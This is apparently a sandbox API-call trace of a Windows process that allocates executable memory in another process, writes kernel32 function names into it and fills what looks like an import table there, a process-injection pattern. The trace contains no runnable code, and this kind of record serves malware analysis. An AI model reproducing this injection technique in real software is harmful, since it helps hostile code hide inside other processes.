	[0225.488] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.488] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.488] lstrlenA (lpString="CloseHandle") returned 11
	[0225.488] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.488] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc37e*, nSize=0xc, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc37e*, lpNumberOfBytesWritten=0x128674*=0xc) returned 1
	[0225.488] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.488] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.489] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.489] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.490] ResetEvent (hEvent=0x5d4) returned 1
	[0225.490] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.490] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.490] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.490] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.490] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.491] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004020, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.491] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.491] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.491] lstrlenA (lpString="lstrcpyA") returned 8
	[0225.491] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.492] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc372*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc372*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0225.492] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.492] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.492] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.493] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.493] ResetEvent (hEvent=0x5d4) returned 1
	[0225.493] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.493] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.493] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.493] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.493] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.493] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004024, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.494] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.494] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.494] lstrlenA (lpString="HeapCreate") returned 10
	[0225.494] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.494] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc216*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc216*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0225.495] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.495] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.495] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.495] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.496] ResetEvent (hEvent=0x5d4) returned 1
	[0225.496] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.496] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.496] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.496] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.496] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004028, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.497] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.497] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.497] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0225.497] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.497] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc224*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc224*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0225.497] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.497] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.497] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.498] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.498] ResetEvent (hEvent=0x5d4) returned 1
	[0225.498] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.499] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.499] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.499] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.499] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.499] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000402c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.499] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.499] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.499] lstrlenA (lpString="LoadLibraryA") returned 12
	[0225.499] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.500] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc238*, nSize=0xd, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc238*, lpNumberOfBytesWritten=0x128674*=0xd) returned 1
	[0225.500] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.500] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.500] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.501] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.501] ResetEvent (hEvent=0x5d4) returned 1
	[0225.501] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.501] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.501] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.501] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.501] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.501] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004030, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.502] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.502] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.502] lstrlenA (lpString="GetProcAddress") returned 14
	[0225.502] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.502] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc248*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc248*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0225.503] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.503] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.503] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.503] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.504] ResetEvent (hEvent=0x5d4) returned 1
	[0225.504] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.504] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.504] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.504] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.504] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.504] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004034, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.505] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.505] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.505] lstrlenA (lpString="HeapFree") returned 8
	[0225.505] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.505] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc25a*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc25a*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0225.505] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.505] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.506] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.506] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.506] ResetEvent (hEvent=0x5d4) returned 1
	[0225.506] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.506] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.507] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.507] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.507] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.507] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004038, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.507] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.507] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.507] lstrlenA (lpString="lstrlenW") returned 8
	[0225.507] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.508] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc266*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc266*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0225.508] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.508] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.508] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.509] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.509] ResetEvent (hEvent=0x5d4) returned 1
	[0225.509] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.509] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.509] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.509] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.509] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.509] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000403c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.510] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.510] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.510] lstrlenA (lpString="lstrcpynW") returned 9
	[0225.510] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.510] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc272*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc272*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0225.511] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.511] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.511] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.511] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.511] ResetEvent (hEvent=0x5d4) returned 1
	[0225.511] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.512] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.512] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.512] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.512] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.512] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004040, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.512] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.513] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.513] lstrlenA (lpString="MultiByteToWideChar") returned 19
	[0225.513] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.513] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc27e*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc27e*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0225.513] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.513] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.513] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.514] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.514] ResetEvent (hEvent=0x5d4) returned 1
	[0225.514] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.514] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.514] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.515] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.515] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.515] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004044, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.515] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.515] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.515] lstrlenA (lpString="HeapAlloc") returned 9
	[0225.515] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.515] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc294*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc294*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0225.516] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.516] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.516] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
